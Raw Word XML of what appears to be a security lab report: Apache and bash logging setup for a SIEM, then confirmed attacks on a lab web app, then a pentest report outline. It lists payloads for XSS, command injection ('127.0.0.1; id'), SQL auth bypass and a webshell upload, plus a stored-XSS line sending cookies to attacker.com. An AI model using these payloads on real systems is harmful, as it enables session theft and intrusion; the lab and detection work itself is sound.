            <wp:docPr id="10337743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9BCDF" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t>Activate the site and restart Apache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703F738D" w14:textId="23B1839C" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02477724" wp14:editId="5CAE3EF1">
            <wp:extent cx="3406140" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="2796327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0DF6F" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>when</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve"> anyone visits http://&lt;VM1-IP&gt;/ (default port 80), Apache serves the website and logs every request into /var/log/apache2/access.log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC87EDD" w14:textId="277C565E" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AB26012" wp14:editId="18D9BF6C">
            <wp:extent cx="3329940" cy="3649980"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="3420255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7C072" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9"/>
    <w:p w14:paraId="1E5EBF4A" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="0089361D" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6: Bash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DD469C" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve">Add history logger to bash configuration and then direct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>bash_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve"> logs to /var/log/bash_history.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEAA883" w14:textId="03059B40" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="781C4AA9" wp14:editId="17B12C85">
            <wp:extent cx="5943600" cy="579120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5295877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F7B43" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:lastRenderedPageBreak/>
        <w:t>Testing the bash logs system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3892BB" w14:textId="25351073" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70692819" wp14:editId="707A7706">
            <wp:extent cx="5943600" cy="1668780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="663783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0F87F" w14:textId="7E3A0258" w:rsidR="008A54FD" w:rsidRDefault="008A54FD" w:rsidP="00394DC9"/>
    <w:p w14:paraId="7529C61D" w14:textId="1271B324" w:rsidR="00DE0C67" w:rsidRPr="00DE0C67" w:rsidRDefault="00DE0C67" w:rsidP="00394DC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE0C67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7: testing the vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721E14A8" w14:textId="0FB2F68E" w:rsidR="00DE0C67" w:rsidRDefault="00DE0C67" w:rsidP="00DE0C67">
      <w:r>
        <w:t xml:space="preserve">1. Reflected XSS - /search - CONFIRMED </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070B52D1" w14:textId="77777777" w:rsidR="00DE0C67" w:rsidRDefault="00DE0C67" w:rsidP="00DE0C67">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>: ?q</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=&lt;script&gt;alert('XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5874D10C" w14:textId="77777777" w:rsidR="00DE0C67" w:rsidRDefault="00DE0C67" w:rsidP="00DE0C67">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Result: Script tag rendered raw inside the HTML response with no sanitization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74975A75" w14:textId="1484B13F" w:rsidR="00DE0C67" w:rsidRDefault="00DE0C67" w:rsidP="00DE0C67">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>SIEM Log: PATH=/search | QUERY=q=&lt;script&gt;alert('XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6192BAB3" w14:textId="47CC5B47" w:rsidR="00DE0C67" w:rsidRDefault="00DE0C67" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00DE0C67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05D67DA6" wp14:editId="325475FA">
            <wp:extent cx="4740166" cy="1350137"/>
            <wp:effectExtent l="0" t="0" r="3810" b="2540"/>
            <wp:docPr id="82319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907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9949" cy="135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061E" w14:textId="66E7CF1F" w:rsidR="00DE0C67" w:rsidRDefault="00DE0C67" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00DE0C67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6601B997" wp14:editId="1FD8177B">
            <wp:extent cx="2426575" cy="1017748"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132573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363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0566" cy="101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0EEE" w14:textId="77777777" w:rsidR="00DE0C67" w:rsidRDefault="00DE0C67" w:rsidP="00394DC9"/>
    <w:p w14:paraId="1EDAB480" w14:textId="656F9912" w:rsidR="00DE0C67" w:rsidRDefault="00DE0C67" w:rsidP="00DE0C67">
      <w:r>
        <w:t>2. File Upload (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) - /profile - CONFIRMED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474B515D" w14:textId="77777777" w:rsidR="00DE0C67" w:rsidRDefault="00DE0C67" w:rsidP="00DE0C67">
      <w:r>
        <w:t xml:space="preserve">Payload: Uploaded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> disguised as profile avatar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7D45D6" w14:textId="77777777" w:rsidR="00DE0C67" w:rsidRDefault="00DE0C67" w:rsidP="00DE0C67">
      <w:r>
        <w:t>Result: File saved directly to static/uploads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — accessible at http://&lt;VM1-IP&gt;/static/uploads/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B1FECA" w14:textId="73ECEF8A" w:rsidR="00DE0C67" w:rsidRDefault="00DE0C67" w:rsidP="00DE0C67">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SIEM Log: PATH=/profile | BODY=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FilesUploaded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: ['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709B7B32" w14:textId="1FFABFC0" w:rsidR="00DE0C67" w:rsidRDefault="00895CB4" w:rsidP="00DE0C67">
      <w:r w:rsidRPr="00895CB4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="719AFC24" wp14:editId="270BC4D8">
            <wp:extent cx="5943600" cy="2546985"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="35978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852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E568" w14:textId="77777777" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00DE0C67"/>
    <w:p w14:paraId="76D217C0" w14:textId="2C1B97B1" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00895CB4">
      <w:r>
        <w:t>3. OS Command Injection - /admin/tools - CONFIRMED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E60633" w14:textId="77777777" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00895CB4">
      <w:r>
        <w:t>Payload: host=127.0.0.1; id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3788D0A2" w14:textId="77777777" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00895CB4">
      <w:r>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1000(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>omar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) gid=1000(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>omar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) groups=1000(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>omar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>),27(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513E8F85" w14:textId="16B8A54E" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00895CB4">
      <w:r>
        <w:t>SIEM Log: PATH=/admin/tools | BODY</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">'host': '127.0.0.1; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>id'}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7612F04C" w14:textId="6C25CCD7" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00895CB4">
      <w:r w:rsidRPr="00895CB4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01305596" wp14:editId="7C9B605E">
            <wp:extent cx="4897821" cy="2015118"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="146150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020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03901" cy="201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1630" w14:textId="77777777" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00895CB4"/>
    <w:p w14:paraId="20AB604B" w14:textId="35F03121" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00895CB4">
      <w:r>
        <w:t xml:space="preserve">4. SQL Injection (Auth Bypass) - /login - CONFIRMED </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999E88C" w14:textId="77777777" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00895CB4">
      <w:r>
        <w:t>Payload: username=admin' OR '1'='1, password=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wrongpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="507B31C1" w14:textId="77777777" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00895CB4">
      <w:r>
        <w:t>Result: Authenticated successfully! Logged in as user 'admin' (Role: Administrator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D96AC0A" w14:textId="21308C5C" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00895CB4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SIEM Log: PATH=/login | BODY</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'username': "admin' OR '1'='1", 'password': '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>wrongpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2669BD21" w14:textId="01CB93CB" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00895CB4">
      <w:r w:rsidRPr="00895CB4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79F18219" wp14:editId="3AD0E22B">
            <wp:extent cx="5943600" cy="3089275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101431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195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DC96" w14:textId="77777777" w:rsidR="00895CB4" w:rsidRDefault="00895CB4" w:rsidP="00895CB4"/>
    <w:p w14:paraId="5FE2E25B" w14:textId="1F69F1D4" w:rsidR="00AD1E97" w:rsidRDefault="00AD1E97" w:rsidP="00AD1E97">
      <w:r>
        <w:t>5. Stored XSS - /feedback - CONFIRMED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E12B1B9" w14:textId="77777777" w:rsidR="00AD1E97" w:rsidRDefault="00AD1E97" w:rsidP="00AD1E97">
      <w:r>
        <w:t>Payload: &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>='http://attacker.com/steal?c='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E38D8ED" w14:textId="77777777" w:rsidR="00AD1E97" w:rsidRDefault="00AD1E97" w:rsidP="00AD1E97">
      <w:r>
        <w:t>Result: Script tag stored in memory and served back to every user who loads the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CED6CB" w14:textId="75E6EA50" w:rsidR="00AD1E97" w:rsidRDefault="00AD1E97" w:rsidP="00AD1E97">
      <w:r>
        <w:t>SIEM Log: PATH=/feedback | BODY</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'name': 'Attacker', 'comment': "&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762EC56E" w14:textId="00176460" w:rsidR="00AD1E97" w:rsidRDefault="00AD1E97" w:rsidP="00AD1E97">
      <w:r w:rsidRPr="00AD1E97">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C726D93" wp14:editId="2A762FAD">
            <wp:extent cx="4671848" cy="2027462"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="176130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096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8341" cy="203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EEB3" w14:textId="32B13AF9" w:rsidR="00AD1E97" w:rsidRDefault="00AD1E97" w:rsidP="00D359F0">
      <w:r>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>redirect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the user to this page each time he tries to open /feedback page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598BC105" w14:textId="5EFB7A6E" w:rsidR="00D359F0" w:rsidRDefault="00D359F0" w:rsidP="00D359F0">
      <w:r w:rsidRPr="00AD1E97">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7094B56F" wp14:editId="14015D9C">
            <wp:extent cx="4382814" cy="1953068"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="79328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851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9002" cy="195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14A0" w14:textId="08C8E5F7" w:rsidR="00D359F0" w:rsidRDefault="00D359F0" w:rsidP="00D359F0">
      <w:r>
        <w:t xml:space="preserve">Logs that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shows</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D33B15" w14:textId="577526F7" w:rsidR="00D359F0" w:rsidRDefault="00D359F0" w:rsidP="00D359F0">
      <w:r w:rsidRPr="00D359F0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4464B144" wp14:editId="4A25E00F">
            <wp:extent cx="5943600" cy="4363085"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37476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601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40FE" w14:textId="77777777" w:rsidR="001D7C3D" w:rsidRDefault="001D7C3D" w:rsidP="00D359F0"/>
    <w:p w14:paraId="503E3E84" w14:textId="1B9710CA" w:rsidR="001D7C3D" w:rsidRDefault="001D7C3D" w:rsidP="00D359F0">
      <w:r>
        <w:t>Step 8: PT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBD6950" w14:textId="351E80BF" w:rsidR="001D7C3D" w:rsidRDefault="006B1D16" w:rsidP="00D359F0">
      <w:r w:rsidRPr="006B1D16">
        <w:t xml:space="preserve">Section 3: Penetration Testing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B22EC6E" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r>
        <w:t>3.1 Engagement Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D4E658" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.1.1 Scope &amp; Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AEF73F" w14:textId="28F1743D" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r>
        <w:t xml:space="preserve">Write </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> your report:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58500713" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Target IP: 192.168.100.205 (VM1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112C3FEB" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Target Application: Nexus Enterprise Portal on port 5000 (or port 80 via Apache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699CCFF1" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Testing Type: Black Box (no source code, no prior knowledge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE24BE2" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>In Scope: Web application only (http://192.168.100.205:5000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6785F630" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Out of Scope: Network infrastructure, other hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19428E85" w14:textId="4C7CA8EA" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Rules: No DoS attacks, testing confined to lab environment</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F980D3" w14:textId="36FB711C" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r>
        <w:t>3.1.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376576C3" w14:textId="672F0F58" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r>
        <w:t>OWASP Testing Guide + Standard PT Phases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5824F38C" w14:textId="4A89F10E" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r>
        <w:t>Reconnaissance → 2. Scanning/Enumeration → 3. Vulnerability Assessment → 4. Exploitation → 5. Post-Exploitation → 6. Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401212C1" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="006B1D16">
      <w:r>
        <w:t>3.1.3 Tools Used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B1D16" w:rsidRPr="006B1D16" w14:paraId="65BDEA05" w14:textId="77777777" w:rsidTr="006B1D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0D0128E" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7075">
            <w:r w:rsidRPr="006B1D16">
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3964A941" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7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1D16">
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B1D16" w:rsidRPr="006B1D16" w14:paraId="1864B7FD" w14:textId="77777777" w:rsidTr="006B1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1C79FA0" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7075">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006B1D16">
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2243A6DA" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7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1D16">
              <w:t>Port scanning &amp; service fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B1D16" w:rsidRPr="006B1D16" w14:paraId="4AD24994" w14:textId="77777777" w:rsidTr="006B1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AF320A0" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7075">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006B1D16">
              <w:t>gobuster</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006B1D16">
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006B1D16">
              <w:t>dirb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C37916A" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7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1D16">
              <w:t>Directory &amp; endpoint enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B1D16" w:rsidRPr="006B1D16" w14:paraId="388CFC5E" w14:textId="77777777" w:rsidTr="006B1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05D83D8" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7075">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006B1D16">
              <w:t>nikto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E97971D" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7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1D16">
              <w:t>Automated web vulnerability scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B1D16" w:rsidRPr="006B1D16" w14:paraId="71A5CB74" w14:textId="77777777" w:rsidTr="006B1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3BA794B" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7075">
            <w:r w:rsidRPr="006B1D16">
              <w:t>Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73CBEF3C" w14:textId="77777777" w:rsidR="006B1D16" w:rsidRPr="006B1D16" w:rsidRDefault="006B1D16" w:rsidP="000C7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1D16">
              <w:t>Manual HTTP interception &amp; payload injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
